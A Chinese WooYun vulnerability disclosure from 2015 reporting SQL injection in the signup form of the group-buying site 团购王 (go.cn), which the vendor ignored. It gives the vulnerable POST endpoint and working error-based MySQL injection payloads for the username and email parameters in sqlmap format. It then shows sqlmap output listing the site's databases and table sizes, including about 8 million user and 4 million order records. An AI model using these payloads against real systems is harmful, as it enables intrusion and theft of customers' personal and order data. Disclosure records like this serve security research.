当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118379

漏洞标题:团购王主站SQL注射800万用户&400万订单信息

相关厂商:团购王

漏洞作者: 路人甲

提交时间:2015-06-05 10:53

修复时间:2015-06-10 10:54

公开时间:2015-06-10 10:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-05: 细节已通知厂商并且等待厂商处理中
2015-06-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

233

详细说明:

注册的地方
http://www.go.cn:80/index.php?m=signup (POST)
commit=%e5%90%8c%e6%84%8f%e5%b9%b6%e6%b3%a8%e5%86%8c&cityid_city=beijing&do=insert&email=ag&password=wyd&password2=wyD&province=%e5%8c%97%e4%ba%ac&subscribe=1&username=wooyun&yanzhengma=1

漏洞证明:

g20150605101900.png


g20150605102023.png


---
Parameter: username (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: commit=%e5%90%8c%e6%84%8f%e5%b9%b6%e6%b3%a8%e5%86%8c&cityid_city=San Francisco&do=insert&email=ag&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&province=%e5%8c%97%e4%ba%ac&subscribe=1&username=agvtjtdb' AND (SELECT 6431 FROM(SELECT COUNT(*),CONCAT(0x7171707171,(SELECT (ELT(6431=6431,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RTTd'='RTTd&yanzhengma=1
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Parameter: email (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: commit=%e5%90%8c%e6%84%8f%e5%b9%b6%e6%b3%a8%e5%86%8c&cityid_city=San Francisco&do=insert&email=ag' AND (SELECT 8651 FROM(SELECT COUNT(*),CONCAT(0x7171707171,(SELECT (ELT(8651=8651,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'krPi'='krPi&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&province=%e5%8c%97%e4%ba%ac&subscribe=1&username=agvtjtdb&yanzhengma=1
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
back-end DBMS: MySQL 5.0
available databases [10]:
[*] baiduzy
[*] go
[*] go.cn
[*] gocnappapi
[*] gocnopen
[*] mysql
[*] nuomi
[*] percona
[*] performance_schema
[*] test
Database: go.cn
+-------------------------------------------+---------+
| Table | Entries |
+-------------------------------------------+---------+
| jiuder_source_address_history | 31943364 |
| jiuder_user | 8062578 |
| jiuder_adminlog | 6192775 |
| jiuder_KeywordSearchInfo | 5645317 |
| jiuder_smslog_20130817 | 4231301 |
| jiuder_order | 4174809 |
| jiuder_subway_station_group_relation | 2776647 |
| jiuder_maillog | 2422258 |
| jiuder_useraddress | 2366783 |
| jiuder_network | 2275597 |
| jiuder_usercoupons | 1639313 |
| jiuder_access_info | 1512328 |
| jiuder_creditlog | 1487229 |
| jiuder_brand_click | 1152692 |
| jiuder_supplier_tuikuan_flow_log | 1065049 |
| jiuder_group | 1043867 |
| jiuder_baidu_type_group | 1043861 |
| jiuder_group_relation_changecate2 | 1040469 |
| jiuder_group_relation_changecate | 1039236 |
| jiuder_supplier_lalotude | 1032639 |
| jiuder_group_information | 1024431 |
| jiuder_360_type_group | 1004924 |
| jiuder_operation_history | 940136 |
| jiuder_othersites_relation_group | 854442 |
| jiuder_area_business_group_relation | 850113 |
| jiuder_water_table_set | 740059 |
| jiuder_groupcoupons | 736374 |
| jiuder_orderlog | 730253 |
| jiuder_invalid_order | 695579 |
| jiuder_lottery | 675531 |
| jiuder_baidurecord | 475263 |
| jiuder_asyncode_order | 475153 |
| ip_address | 403719 |
| jiuder_smslog | 399792 |
| jiuder_source | 377672 |
| jiuder_user_subjoin | 346186 |
| jiuder_call_log | 340588 |
| jiuder_supplier_schedule | 331731 |
| jiuder_supplier_tuikuan_yunfei | 318747 |
| jiuder_group_property_value | 303649 |
| jiuder_error_log | 274149 |
| jiuder_order_return_log | 216548 |
| jiuder_supplier_tuikuan_flow_log_history | 209341 |
| jiuder_asyncode_order_history | 207810 |
| jiuder_supplier_tuikuan_flow_info | 206542 |
| jiuder_supplier_tuikuan | 198427 |
| jiuder_total_salenum_table | 195616 |
| jiuder_group_relation_type | 157447 |
| jiuder_click_demand | 127518 |
| jiuder_consult | 121296 |
| jiuder_group_property_relation | 120071 |
| jiuder_group_top_gid | 108376 |
| jiuder_order_return | 104903 |
| jiuder_api_visits | 104008 |
| jiuder_complaints | 103539 |
| jiuder_othersites_relation_user | 98315 |
| jiuder_group_oneday_statistics | 97446 |
| jiuder_totalorder | 89057 |
| jiuder_chargecard | 84374 |
| jiuder_KeywordSearchHistory | 84318 |
| jiuder_feedback | 82449 |
| jiuder_ctrip_usetime_change | 75469 |
| jiuder_supplier_tuikuan_flow_info_history | 74400 |
| jiuder_othersites_relation_order | 67580 |
| jiuder_group_property_name | 67258 |
| jiuder_waplog | 58926 |
| jiuder_luckgame_log | 54031 |
| jiuder_source_address | 52825 |
| jiuder_voucher_order_act | 51440 |
| jiuder_daily_statistic | 51089 |
| jiuder_projects | 41561 |
| jiuder_invite | 37080 |
| jiuder_modify_mobilebind | 33033 |
| jiuder_holiday | 28506 |
| jiuder_area_and_business | 25055 |
| jiuder_supplier | 22215 |
| jiuder_change_api_gid | 21420 |
| jiuder_group_api_line | 21329 |
| egg_record | 17002 |
| jiuder_maillist | 13297 |
| jiuder_supplier_tuikuan_account | 12600 |
| jiuder_masses_comments | 11658 |
| jiuder_set_jinshan_api | 11650 |
| tmp | 10000 |
.......................

修复方案:

~~~~~~~~~~~~~请别放弃治疗。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-10 10:54

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-05 11:11 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    这个我猜测会火啊

  2. 2015-06-05 13:13 | DeadSea ( 实习白帽子 | Rank:86 漏洞数:28 | 静心)

    @小龙 你看看人家

  3. 2015-06-05 19:48 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @DeadSea 看你麻痹滚去睡